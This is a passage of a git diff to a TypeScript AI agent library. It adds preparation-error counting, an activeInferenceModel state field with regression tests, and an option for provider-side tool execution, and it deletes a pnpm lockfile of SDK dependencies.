*/ @@ -379,7 +484,7 @@ async function executeToolCalls( config: AgentLoopConfig, signal: AbortSignal | undefined, stream: EventStream, -): Promise<{ toolResults: ToolResultMessage[]; steeringMessages?: AgentMessage[] }> { +): Promise { const toolCalls = assistantMessage.content.filter((c) => c.type === "toolCall") as AgentToolCall[]; if (config.toolExecution === "sequential") { return executeToolCallsSequential(currentContext, assistantMessage, toolCalls, config, signal, stream); @@ -394,9 +499,10 @@ async function executeToolCallsSequential( config: AgentLoopConfig, signal: AbortSignal | undefined, stream: EventStream, -): Promise<{ toolResults: ToolResultMessage[]; steeringMessages?: AgentMessage[] }> { +): Promise { const results: ToolResultMessage[] = []; let steeringMessages: AgentMessage[] | undefined; + let preparationErrorCount = 0; for (let index = 0; index < toolCalls.length; index++) { const toolCall = toolCalls[index]; @@ -409,6 +515,9 @@ async function executeToolCallsSequential( const preparation = await prepareToolCall(currentContext, assistantMessage, toolCall, config, signal); if (preparation.kind === "immediate") { + if (preparation.isError) { + preparationErrorCount++; + } results.push(emitToolCallOutcome(toolCall, preparation.result, preparation.isError, stream)); } else { const executed = await executePreparedToolCall(preparation, signal, stream); @@ -438,7 +547,7 @@ async function executeToolCallsSequential( } } - return { toolResults: results, steeringMessages }; + return { toolResults: results, steeringMessages, preparationErrorCount }; } async function executeToolCallsParallel( @@ -448,10 +557,11 @@ async function executeToolCallsParallel( config: AgentLoopConfig, signal: AbortSignal | undefined, stream: EventStream, -): Promise<{ toolResults: ToolResultMessage[]; steeringMessages?: AgentMessage[] }> { +): Promise { const results: ToolResultMessage[] = []; const runnableCalls: PreparedToolCall[] = []; let steeringMessages: AgentMessage[] | 
undefined; + let preparationErrorCount = 0; for (let index = 0; index < toolCalls.length; index++) { const toolCall = toolCalls[index]; @@ -464,6 +574,9 @@ async function executeToolCallsParallel( const preparation = await prepareToolCall(currentContext, assistantMessage, toolCall, config, signal); if (preparation.kind === "immediate") { + if (preparation.isError) { + preparationErrorCount++; + } results.push(emitToolCallOutcome(toolCall, preparation.result, preparation.isError, stream)); } else { runnableCalls.push(preparation); @@ -480,7 +593,7 @@ async function executeToolCallsParallel( for (const skipped of remainingCalls) { results.push(skipToolCall(skipped, stream)); } - return { toolResults: results, steeringMessages }; + return { toolResults: results, steeringMessages, preparationErrorCount }; } } } @@ -512,7 +625,7 @@ async function executeToolCallsParallel( } } - return { toolResults: results, steeringMessages }; + return { toolResults: results, steeringMessages, preparationErrorCount }; } type PreparedToolCall = { diff --git a/packages/pi-agent-core/src/agent.test.ts b/packages/pi-agent-core/src/agent.test.ts new file mode 100644 index 000000000..e0b838cd4 --- /dev/null +++ b/packages/pi-agent-core/src/agent.test.ts @@ -0,0 +1,53 @@ +// Agent activeInferenceModel regression tests +// Verifies that activeInferenceModel is set/cleared correctly in _runLoop, +// and that the footer reads activeInferenceModel instead of state.model. 
+// Regression test for https://github.com/gsd-build/gsd-2/issues/1844 Bug 2 + +import { describe, it } from "node:test"; +import assert from "node:assert/strict"; +import { readFileSync } from "node:fs"; +import { join, dirname } from "node:path"; +import { fileURLToPath } from "node:url"; + +const __dirname = dirname(fileURLToPath(import.meta.url)); + +describe("Agent — activeInferenceModel (#1844 Bug 2)", () => { + it("activeInferenceModel is declared in AgentState interface", () => { + const typesSource = readFileSync(join(__dirname, "types.ts"), "utf-8"); + assert.match(typesSource, /activeInferenceModel\??:\s*Model/, + "AgentState must declare activeInferenceModel field"); + }); + + it("_runLoop sets activeInferenceModel before streaming and clears in finally", () => { + const agentSource = readFileSync(join(__dirname, "agent.ts"), "utf-8"); + + // Must set activeInferenceModel = model before streaming starts + const setLine = agentSource.indexOf("this._state.activeInferenceModel = model"); + assert.ok(setLine > -1, "agent.ts must set activeInferenceModel = model in _runLoop"); + + // Must clear activeInferenceModel = undefined after streaming completes + const clearLine = agentSource.indexOf("this._state.activeInferenceModel = undefined"); + assert.ok(clearLine > -1, "agent.ts must clear activeInferenceModel in finally block"); + + // The set must come before the clear + assert.ok(setLine < clearLine, "activeInferenceModel must be set before cleared"); + }); + + it("footer displays activeInferenceModel instead of state.model", () => { + const footerPath = join(__dirname, "..", "..", "pi-coding-agent", "src", + "modes", "interactive", "components", "footer.ts"); + const footerSource = readFileSync(footerPath, "utf-8"); + assert.match(footerSource, /activeInferenceModel/, + "footer.ts must reference activeInferenceModel for display"); + }); + + it("activeInferenceModel is set before AbortController creation", () => { + const agentSource = 
readFileSync(join(__dirname, "agent.ts"), "utf-8"); + + const setLine = agentSource.indexOf("this._state.activeInferenceModel = model"); + const abortLine = agentSource.indexOf("this.abortController = new AbortController"); + assert.ok(setLine > -1 && abortLine > -1); + assert.ok(setLine < abortLine, + "activeInferenceModel must be set before streaming infrastructure is created"); + }); +}); diff --git a/packages/pi-agent-core/src/agent.ts b/packages/pi-agent-core/src/agent.ts index 112573650..e65ae7a35 100644 --- a/packages/pi-agent-core/src/agent.ts +++ b/packages/pi-agent-core/src/agent.ts @@ -101,6 +101,13 @@ export interface AgentOptions { * Default: 60000 (60 seconds). Set to 0 to disable the cap. */ maxRetryDelayMs?: number; + + /** + * Determines whether a model uses external tool execution (tools handled + * by the provider, not dispatched locally). Evaluated per-loop so model + * switches mid-session are handled correctly. + */ + externalToolExecution?: (model: Model) => boolean; } /** @@ -144,6 +151,7 @@ export class Agent { private _maxRetryDelayMs?: number; private _beforeToolCall?: AgentLoopConfig["beforeToolCall"]; private _afterToolCall?: AgentLoopConfig["afterToolCall"]; + private _externalToolExecution?: (model: Model) => boolean; constructor(opts: AgentOptions = {}) { this._state = { ...this._state, ...opts.initialState }; @@ -158,6 +166,7 @@ export class Agent { this._thinkingBudgets = opts.thinkingBudgets; this._transport = opts.transport ?? 
"sse"; this._maxRetryDelayMs = opts.maxRetryDelayMs; + this._externalToolExecution = opts.externalToolExecution; } /** @@ -457,6 +466,8 @@ export class Agent { const model = this._state.model; if (!model) throw new Error("No model configured"); + this._state.activeInferenceModel = model; + this.runningPrompt = new Promise((resolve) => { this.resolveRunningPrompt = resolve; }); @@ -497,6 +508,7 @@ export class Agent { getFollowUpMessages: async () => this.dequeueFollowUpMessages(), beforeToolCall: this._beforeToolCall, afterToolCall: this._afterToolCall, + externalToolExecution: this._externalToolExecution?.(model) ?? false, }; let partial: AgentMessage | null = null; @@ -581,6 +593,7 @@ export class Agent { this._state.isStreaming = false; this._state.streamMessage = null; this._state.pendingToolCalls = new Set(); + this._state.activeInferenceModel = undefined; this.abortController = undefined; this.resolveRunningPrompt?.(); this.runningPrompt = undefined; diff --git a/packages/pi-agent-core/src/proxy.ts b/packages/pi-agent-core/src/proxy.ts index 619521bda..574ec2bf6 100644 --- a/packages/pi-agent-core/src/proxy.ts +++ b/packages/pi-agent-core/src/proxy.ts @@ -47,7 +47,7 @@ export type ProxyAssistantMessageEvent = | { type: "toolcall_end"; contentIndex: number } | { type: "done"; - reason: Extract; + reason: Extract; usage: AssistantMessage["usage"]; } | { diff --git a/packages/pi-agent-core/src/types.ts b/packages/pi-agent-core/src/types.ts index cfeba8895..846764edd 100644 --- a/packages/pi-agent-core/src/types.ts +++ b/packages/pi-agent-core/src/types.ts @@ -193,6 +193,16 @@ export interface AgentLoopConfig extends SimpleStreamOptions { * The hook receives the agent abort signal and is responsible for honoring it. */ afterToolCall?: (context: AfterToolCallContext, signal?: AbortSignal) => Promise; + + /** + * When true, tool calls in assistant messages are rendered in the TUI + * but NOT executed locally. 
Used for providers that handle tool execution + * internally (e.g., Claude Code CLI via Agent SDK). + * + * The agent loop emits tool_execution_start/end events for TUI rendering + * but skips tool.execute() and does not add tool results to context. + */ + externalToolExecution?: boolean; } /** @@ -239,6 +249,12 @@ export interface AgentState { streamMessage: AgentMessage | null; pendingToolCalls: Set; error?: string; + /** + * The model currently being used for inference. Set at _runLoop() start, + * cleared when the loop ends. When present, UI should display this instead + * of `model` to avoid showing a stale value after a mid-turn model switch. + */ + activeInferenceModel?: Model; } export interface AgentToolResult { diff --git a/packages/pi-agent-core/tsconfig.json b/packages/pi-agent-core/tsconfig.json index 6f6331d49..26fd8b429 100644 --- a/packages/pi-agent-core/tsconfig.json +++ b/packages/pi-agent-core/tsconfig.json @@ -23,5 +23,5 @@ "rootDir": "./src" }, "include": ["src/**/*.ts"], - "exclude": ["node_modules", "dist", "**/*.d.ts", "src/**/*.d.ts"] + "exclude": ["node_modules", "dist", "**/*.d.ts", "src/**/*.d.ts", "src/**/*.test.ts"] } diff --git a/packages/pi-ai/pnpm-lock.yaml b/packages/pi-ai/pnpm-lock.yaml deleted file mode 100644 index 89cc9199b..000000000 --- a/packages/pi-ai/pnpm-lock.yaml +++ /dev/null @@ -1,2022 +0,0 @@ -lockfileVersion: '9.0' - -settings: - autoInstallPeers: true - excludeLinksFromLockfile: false - -importers: - - .: - dependencies: - '@anthropic-ai/sdk': - specifier: ^0.73.0 - version: 0.73.0(zod@4.3.6) - '@aws-sdk/client-bedrock-runtime': - specifier: ^3.983.0 - version: 3.1009.0 - '@google/genai': - specifier: ^1.40.0 - version: 1.45.0 - '@mistralai/mistralai': - specifier: 1.14.1 - version: 1.14.1 - '@sinclair/typebox': - specifier: ^0.34.41 - version: 0.34.48 - ajv: - specifier: ^8.17.1 - version: 8.18.0 - ajv-formats: - specifier: ^3.0.1 - version: 3.0.1(ajv@8.18.0) - chalk: - specifier: ^5.6.2 - version: 5.6.2 - openai: 
- specifier: 6.26.0 - version: 6.26.0(ws@8.19.0)(zod@4.3.6) - proxy-agent: - specifier: ^6.5.0 - version: 6.5.0 - undici: - specifier: ^7.24.2 - version: 7.24.4 - zod-to-json-schema: - specifier: ^3.24.6 - version: 3.25.1(zod@4.3.6) - devDependencies: - '@smithy/node-http-handler': - specifier: ^4.5.0 - version: 4.5.0 - -packages: - - '@anthropic-ai/sdk@0.73.0': - resolution: {integrity: sha512-URURVzhxXGJDGUGFunIOtBlSl7KWvZiAAKY/ttTkZAkXT9bTPqdk2eK0b8qqSxXpikh3QKPnPYpiyX98zf5ebw==} - hasBin: true - peerDependencies: - zod: ^3.25.0 || ^4.0.0 - peerDependenciesMeta: - zod: - optional: true - - '@aws-crypto/crc32@5.2.0': - resolution: {integrity: sha512-nLbCWqQNgUiwwtFsen1AdzAtvuLRsQS8rYgMuxCrdKf9kOssamGLuPwyTY9wyYblNr9+1XM8v6zoDTPPSIeANg==} - engines: {node: '>=16.0.0'} - - '@aws-crypto/sha256-browser@5.2.0': - resolution: {integrity: sha512-AXfN/lGotSQwu6HNcEsIASo7kWXZ5HYWvfOmSNKDsEqC4OashTp8alTmaz+F7TC2L083SFv5RdB+qU3Vs1kZqw==} - - '@aws-crypto/sha256-js@5.2.0': - resolution: {integrity: sha512-FFQQyu7edu4ufvIZ+OadFpHHOt+eSTBaYaki44c+akjg7qZg9oOQeLlk77F6tSYqjDAFClrHJk9tMf0HdVyOvA==} - engines: {node: '>=16.0.0'} - - '@aws-crypto/supports-web-crypto@5.2.0': - resolution: {integrity: sha512-iAvUotm021kM33eCdNfwIN//F77/IADDSs58i+MDaOqFrVjZo9bAal0NK7HurRuWLLpF1iLX7gbWrjHjeo+YFg==} - - '@aws-crypto/util@5.2.0': - resolution: {integrity: sha512-4RkU9EsI6ZpBve5fseQlGNUWKMa1RLPQ1dnjnQoe07ldfIzcsGb5hC5W0Dm7u423KWzawlrpbjXBrXCEv9zazQ==} - - '@aws-sdk/client-bedrock-runtime@3.1009.0': - resolution: {integrity: sha512-0k9d0oO6nw3Y6jtgs1cmMPNuwAVPQahIoshKK3NDfhVQR1wNC90/gSpdfa9GKswe8XRq/ZZlq7ny0qM1rd/Hkg==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/core@3.973.20': - resolution: {integrity: sha512-i3GuX+lowD892F3IuJf8o6AbyDupMTdyTxQrCJGcn71ni5hTZ82L4nQhcdumxZ7XPJRJJVHS/CR3uYOIIs0PVA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/credential-provider-env@3.972.18': - resolution: {integrity: 
sha512-X0B8AlQY507i5DwjLByeU2Af4ARsl9Vr84koDcXCbAkplmU+1xBFWxEPrWRAoh56waBne/yJqEloSwvRf4x6XA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/credential-provider-http@3.972.20': - resolution: {integrity: sha512-ey9Lelj001+oOfrbKmS6R2CJAiXX7QKY4Vj9VJv6L2eE6/VjD8DocHIoYqztTm70xDLR4E1jYPTKfIui+eRNDA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/credential-provider-ini@3.972.20': - resolution: {integrity: sha512-5flXSnKHMloObNF+9N0cupKegnH1Z37cdVlpETVgx8/rAhCe+VNlkcZH3HDg2SDn9bI765S+rhNPXGDJJPfbtA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/credential-provider-login@3.972.20': - resolution: {integrity: sha512-gEWo54nfqp2jABMu6HNsjVC4hDLpg9HC8IKSJnp0kqWtxIJYHTmiLSsIfI4ScQjxEwpB+jOOH8dOLax1+hy/Hw==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/credential-provider-node@3.972.21': - resolution: {integrity: sha512-hah8if3/B/Q+LBYN5FukyQ1Mym6PLPDsBOBsIgNEYD6wLyZg0UmUF/OKIVC3nX9XH8TfTPuITK+7N/jenVACWA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/credential-provider-process@3.972.18': - resolution: {integrity: sha512-Tpl7SRaPoOLT32jbTWchPsn52hYYgJ0kpiFgnwk8pxTANQdUymVSZkzFvv1+oOgZm1CrbQUP9MBeoMZ9IzLZjA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/credential-provider-sso@3.972.20': - resolution: {integrity: sha512-p+R+PYR5Z7Gjqf/6pvbCnzEHcqPCpLzR7Yf127HjJ6EAb4hUcD+qsNRnuww1sB/RmSeCLxyay8FMyqREw4p1RA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/credential-provider-web-identity@3.972.20': - resolution: {integrity: sha512-rWCmh8o7QY4CsUj63qopzMzkDq/yPpkrpb+CnjBEFSOg/02T/we7sSTVg4QsDiVS9uwZ8VyONhq98qt+pIh3KA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/eventstream-handler-node@3.972.11': - resolution: {integrity: sha512-2IrLrOruRr1NhTK0vguBL1gCWv1pu4bf4KaqpsA+/vCJpFEbvXFawn71GvCzk1wyjnDUsemtKypqoKGv4cSGbA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/middleware-eventstream@3.972.8': - resolution: {integrity: sha512-r+oP+tbCxgqXVC3pu3MUVePgSY0ILMjA+aEwOosS77m3/DRbtvHrHwqvMcw+cjANMeGzJ+i0ar+n77KXpRA8RQ==} - engines: {node: '>=20.0.0'} - - 
'@aws-sdk/middleware-host-header@3.972.8': - resolution: {integrity: sha512-wAr2REfKsqoKQ+OkNqvOShnBoh+nkPurDKW7uAeVSu6kUECnWlSJiPvnoqxGlfousEY/v9LfS9sNc46hjSYDIQ==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/middleware-logger@3.972.8': - resolution: {integrity: sha512-CWl5UCM57WUFaFi5kB7IBY1UmOeLvNZAZ2/OZ5l20ldiJ3TiIz1pC65gYj8X0BCPWkeR1E32mpsCk1L1I4n+lA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/middleware-recursion-detection@3.972.8': - resolution: {integrity: sha512-BnnvYs2ZEpdlmZ2PNlV2ZyQ8j8AEkMTjN79y/YA475ER1ByFYrkVR85qmhni8oeTaJcDqbx364wDpitDAA/wCA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/middleware-user-agent@3.972.21': - resolution: {integrity: sha512-62XRl1GDYPpkt7cx1AX1SPy9wgNE9Iw/NPuurJu4lmhCWS7sGKO+kS53TQ8eRmIxy3skmvNInnk0ZbWrU5Dpyg==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/middleware-websocket@3.972.13': - resolution: {integrity: sha512-Gp6EWIqHX5wmsOR5ZxWyyzEU8P0xBdSxkm6VHEwXwBqScKZ7QWRoj6ZmHpr+S44EYb5tuzGya4ottsogSu2W3A==} - engines: {node: '>= 14.0.0'} - - '@aws-sdk/nested-clients@3.996.10': - resolution: {integrity: sha512-SlDol5Z+C7Ivnc2rKGqiqfSUmUZzY1qHfVs9myt/nxVwswgfpjdKahyTzLTx802Zfq0NFRs7AejwKzzzl5Co2w==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/region-config-resolver@3.972.8': - resolution: {integrity: sha512-1eD4uhTDeambO/PNIDVG19A6+v4NdD7xzwLHDutHsUqz0B+i661MwQB2eYO4/crcCvCiQG4SRm1k81k54FEIvw==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/token-providers@3.1009.0': - resolution: {integrity: sha512-KCPLuTqN9u0Rr38Arln78fRG9KXpzsPWmof+PZzfAHMMQq2QED6YjQrkrfiH7PDefLWEposY1o4/eGwrmKA4JA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/types@3.973.6': - resolution: {integrity: sha512-Atfcy4E++beKtwJHiDln2Nby8W/mam64opFPTiHEqgsthqeydFS1pY+OUlN1ouNOmf8ArPU/6cDS65anOP3KQw==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/util-endpoints@3.996.5': - resolution: {integrity: sha512-Uh93L5sXFNbyR5sEPMzUU8tJ++Ku97EY4udmC01nB8Zu+xfBPwpIwJ6F7snqQeq8h2pf+8SGN5/NoytfKgYPIw==} - engines: {node: '>=20.0.0'} - - 
'@aws-sdk/util-format-url@3.972.8': - resolution: {integrity: sha512-J6DS9oocrgxM8xlUTTmQOuwRF6rnAGEujAN9SAzllcrQmwn5iJ58ogxy3SEhD0Q7JZvlA5jvIXBkpQRqEqlE9A==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/util-locate-window@3.965.5': - resolution: {integrity: sha512-WhlJNNINQB+9qtLtZJcpQdgZw3SCDCpXdUJP7cToGwHbCWCnRckGlc6Bx/OhWwIYFNAn+FIydY8SZ0QmVu3xTQ==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/util-user-agent-browser@3.972.8': - resolution: {integrity: sha512-B3KGXJviV2u6Cdw2SDY2aDhoJkVfY/Q/Trwk2CMSkikE1Oi6gRzxhvhIfiRpHfmIsAhV4EA54TVEX8K6CbHbkA==} - - '@aws-sdk/util-user-agent-node@3.973.7': - resolution: {integrity: sha512-Hz6EZMUAEzqUd7e+vZ9LE7mn+5gMbxltXy18v+YSFY+9LBJz15wkNZvw5JqfX3z0FS9n3bgUtz3L5rAsfh4YlA==} - engines: {node: '>=20.0.0'} - peerDependencies: - aws-crt: '>=1.0.0' - peerDependenciesMeta: - aws-crt: - optional: true - - '@aws-sdk/xml-builder@3.972.11': - resolution: {integrity: sha512-iitV/gZKQMvY9d7ovmyFnFuTHbBAtrmLnvaSb/3X8vOKyevwtpmEtyc8AdhVWZe0pI/1GsHxlEvQeOePFzy7KQ==} - engines: {node: '>=20.0.0'} - - '@aws/lambda-invoke-store@0.2.4': - resolution: {integrity: sha512-iY8yvjE0y651BixKNPgmv1WrQc+GZ142sb0z4gYnChDDY2YqI4P/jsSopBWrKfAt7LOJAkOXt7rC/hms+WclQQ==} - engines: {node: '>=18.0.0'} - - '@babel/runtime@7.28.6': - resolution: {integrity: sha512-05WQkdpL9COIMz4LjTxGpPNCdlpyimKppYNoJ5Di5EUObifl8t4tuLuUBBZEpoLYOmfvIWrsp9fCl0HoPRVTdA==} - engines: {node: '>=6.9.0'} - - '@google/genai@1.45.0': - resolution: {integrity: sha512-+sNRWhKiRibVgc4OKi7aBJJ0A7RcoVD8tGG+eFkqxAWRjASDW+ktS9lLwTDnAxZICzCVoeAdu8dYLJVTX60N9w==} - engines: {node: '>=20.0.0'} - peerDependencies: - '@modelcontextprotocol/sdk': ^1.25.2 - peerDependenciesMeta: - '@modelcontextprotocol/sdk': - optional: true - - '@isaacs/cliui@8.0.2': - resolution: {integrity: sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==} - engines: {node: '>=12'} - - '@mistralai/mistralai@1.14.1': - resolution: {integrity: 
sha512-IiLmmZFCCTReQgPAT33r7KQ1nYo5JPdvGkrkZqA8qQ2qB1GHgs5LoP5K2ICyrjnpw2n8oSxMM/VP+liiKcGNlQ==} - - '@pkgjs/parseargs@0.11.0': - resolution: {integrity: sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==} - engines: {node: '>=14'} - - '@protobufjs/aspromise@1.1.2': - resolution: {integrity: sha512-j+gKExEuLmKwvz3OgROXtrJ2UG2x8Ch2YZUxahh+s1F2HZ+wAceUNLkvy6zKCPVRkU++ZWQrdxsUeQXmcg4uoQ==} - - '@protobufjs/base64@1.1.2': - resolution: {integrity: sha512-AZkcAA5vnN/v4PDqKyMR5lx7hZttPDgClv83E//FMNhR2TMcLUhfRUBHCmSl0oi9zMgDDqRUJkSxO3wm85+XLg==} - - '@protobufjs/codegen@2.0.4': - resolution: {integrity: sha512-YyFaikqM5sH0ziFZCN3xDC7zeGaB/d0IUb9CATugHWbd1FRFwWwt4ld4OYMPWu5a3Xe01mGAULCdqhMlPl29Jg==} - - '@protobufjs/eventemitter@1.1.0': - resolution: {integrity: sha512-j9ednRT81vYJ9OfVuXG6ERSTdEL1xVsNgqpkxMsbIabzSo3goCjDIveeGv5d03om39ML71RdmrGNjG5SReBP/Q==} - - '@protobufjs/fetch@1.1.0': - resolution: {integrity: sha512-lljVXpqXebpsijW71PZaCYeIcE5on1w5DlQy5WH6GLbFryLUrBD4932W/E2BSpfRJWseIL4v/KPgBFxDOIdKpQ==} - - '@protobufjs/float@1.0.2': - resolution: {integrity: sha512-Ddb+kVXlXst9d+R9PfTIxh1EdNkgoRe5tOX6t01f1lYWOvJnSPDBlG241QLzcyPdoNTsblLUdujGSE4RzrTZGQ==} - - '@protobufjs/inquire@1.1.0': - resolution: {integrity: sha512-kdSefcPdruJiFMVSbn801t4vFK7KB/5gd2fYvrxhuJYg8ILrmn9SKSX2tZdV6V+ksulWqS7aXjBcRXl3wHoD9Q==} - - '@protobufjs/path@1.1.2': - resolution: {integrity: sha512-6JOcJ5Tm08dOHAbdR3GrvP+yUUfkjG5ePsHYczMFLq3ZmMkAD98cDgcT2iA1lJ9NVwFd4tH/iSSoe44YWkltEA==} - - '@protobufjs/pool@1.1.0': - resolution: {integrity: sha512-0kELaGSIDBKvcgS4zkjz1PeddatrjYcmMWOlAuAPwAeccUrPHdUqo/J6LiymHHEiJT5NrF1UVwxY14f+fy4WQw==} - - '@protobufjs/utf8@1.1.0': - resolution: {integrity: sha512-Vvn3zZrhQZkkBE8LSuW3em98c0FwgO4nxzv6OdSxPKJIEKY2bGbHn+mhGIPerzI4twdxaP8/0+06HBpwf345Lw==} - - '@sinclair/typebox@0.34.48': - resolution: {integrity: sha512-kKJTNuK3AQOrgjjotVxMrCn1sUJwM76wMszfq1kdU4uYVJjvEWuFQ6HgvLt4Xz3fSmZlTOxJ/Ie13KnIcWQXFA==} - - 
'@smithy/abort-controller@4.2.12': - resolution: {integrity: sha512-xolrFw6b+2iYGl6EcOL7IJY71vvyZ0DJ3mcKtpykqPe2uscwtzDZJa1uVQXyP7w9Dd+kGwYnPbMsJrGISKiY/Q==} - engines: {node: '>=18.0.0'} - - '@smithy/config-resolver@4.4.11': - resolution: {integrity: sha512-YxFiiG4YDAtX7WMN7RuhHZLeTmRRAOyCbr+zB8e3AQzHPnUhS8zXjB1+cniPVQI3xbWsQPM0X2aaIkO/ME0ymw==} - engines: {node: '>=18.0.0'} - - '@smithy/core@3.23.12': - resolution: {integrity: sha512-o9VycsYNtgC+Dy3I0yrwCqv9CWicDnke0L7EVOrZtJpjb2t0EjaEofmMrYc0T1Kn3yk32zm6cspxF9u9Bj7e5w==} - engines: {node: '>=18.0.0'} - - '@smithy/credential-provider-imds@4.2.12': - resolution: {integrity: sha512-cr2lR792vNZcYMriSIj+Um3x9KWrjcu98kn234xA6reOAFMmbRpQMOv8KPgEmLLtx3eldU6c5wALKFqNOhugmg==} - engines: {node: '>=18.0.0'} - - '@smithy/eventstream-codec@4.2.12': - resolution: {integrity: sha512-FE3bZdEl62ojmy8x4FHqxq2+BuOHlcxiH5vaZ6aqHJr3AIZzwF5jfx8dEiU/X0a8RboyNDjmXjlbr8AdEyLgiA==} - engines: {node: '>=18.0.0'} - - '@smithy/eventstream-serde-browser@4.2.12': - resolution: {integrity: sha512-XUSuMxlTxV5pp4VpqZf6Sa3vT/Q75FVkLSpSSE3KkWBvAQWeuWt1msTv8fJfgA4/jcJhrbrbMzN1AC/hvPmm5A==} - engines: {node: '>=18.0.0'} - - '@smithy/eventstream-serde-config-resolver@4.3.12': - resolution: {integrity: sha512-7epsAZ3QvfHkngz6RXQYseyZYHlmWXSTPOfPmXkiS+zA6TBNo1awUaMFL9vxyXlGdoELmCZyZe1nQE+imbmV+Q==} - engines: {node: '>=18.0.0'} - - '@smithy/eventstream-serde-node@4.2.12': - resolution: {integrity: sha512-D1pFuExo31854eAvg89KMn9Oab/wEeJR6Buy32B49A9Ogdtx5fwZPqBHUlDzaCDpycTFk2+fSQgX689Qsk7UGA==} - engines: {node: '>=18.0.0'} - - '@smithy/eventstream-serde-universal@4.2.12': - resolution: {integrity: sha512-+yNuTiyBACxOJUTvbsNsSOfH9G9oKbaJE1lNL3YHpGcuucl6rPZMi3nrpehpVOVR2E07YqFFmtwpImtpzlouHQ==} - engines: {node: '>=18.0.0'} - - '@smithy/fetch-http-handler@5.3.15': - resolution: {integrity: sha512-T4jFU5N/yiIfrtrsb9uOQn7RdELdM/7HbyLNr6uO/mpkj1ctiVs7CihVr51w4LyQlXWDpXFn4BElf1WmQvZu/A==} - engines: {node: '>=18.0.0'} - - '@smithy/hash-node@4.2.12': - 
resolution: {integrity: sha512-QhBYbGrbxTkZ43QoTPrK72DoYviDeg6YKDrHTMJbbC+A0sml3kSjzFtXP7BtbyJnXojLfTQldGdUR0RGD8dA3w==} - engines: {node: '>=18.0.0'} - - '@smithy/invalid-dependency@4.2.12': - resolution: {integrity: sha512-/4F1zb7Z8LOu1PalTdESFHR0RbPwHd3FcaG1sI3UEIriQTWakysgJr65lc1jj6QY5ye7aFsisajotH6UhWfm/g==} - engines: {node: '>=18.0.0'} - - '@smithy/is-array-buffer@2.2.0': - resolution: {integrity: sha512-GGP3O9QFD24uGeAXYUjwSTXARoqpZykHadOmA8G5vfJPK0/DC67qa//0qvqrJzL1xc8WQWX7/yc7fwudjPHPhA==} - engines: {node: '>=14.0.0'} - - '@smithy/is-array-buffer@4.2.2': - resolution: {integrity: sha512-n6rQ4N8Jj4YTQO3YFrlgZuwKodf4zUFs7EJIWH86pSCWBaAtAGBFfCM7Wx6D2bBJ2xqFNxGBSrUWswT3M0VJow==} - engines: {node: '>=18.0.0'} - - '@smithy/middleware-content-length@4.2.12': - resolution: {integrity: sha512-YE58Yz+cvFInWI/wOTrB+DbvUVz/pLn5mC5MvOV4fdRUc6qGwygyngcucRQjAhiCEbmfLOXX0gntSIcgMvAjmA==} - engines: {node: '>=18.0.0'} - - '@smithy/middleware-endpoint@4.4.26': - resolution: {integrity: sha512-8Qfikvd2GVKSm8S6IbjfwFlRY9VlMrj0Dp4vTwAuhqbX7NhJKE5DQc2bnfJIcY0B+2YKMDBWfvexbSZeejDgeg==} - engines: {node: '>=18.0.0'} - - '@smithy/middleware-retry@4.4.43': - resolution: {integrity: sha512-ZwsifBdyuNHrFGmbc7bAfP2b54+kt9J2rhFd18ilQGAB+GDiP4SrawqyExbB7v455QVR7Psyhb2kjULvBPIhvA==} - engines: {node: '>=18.0.0'} - - '@smithy/middleware-serde@4.2.15': - resolution: {integrity: sha512-ExYhcltZSli0pgAKOpQQe1DLFBLryeZ22605y/YS+mQpdNWekum9Ujb/jMKfJKgjtz1AZldtwA/wCYuKJgjjlg==} - engines: {node: '>=18.0.0'} - - '@smithy/middleware-stack@4.2.12': - resolution: {integrity: sha512-kruC5gRHwsCOuyCd4ouQxYjgRAym2uDlCvQ5acuMtRrcdfg7mFBg6blaxcJ09STpt3ziEkis6bhg1uwrWU7txw==} - engines: {node: '>=18.0.0'} - - '@smithy/node-config-provider@4.3.12': - resolution: {integrity: sha512-tr2oKX2xMcO+rBOjobSwVAkV05SIfUKz8iI53rzxEmgW3GOOPOv0UioSDk+J8OpRQnpnhsO3Af6IEBabQBVmiw==} - engines: {node: '>=18.0.0'} - - '@smithy/node-http-handler@4.5.0': - resolution: {integrity: 
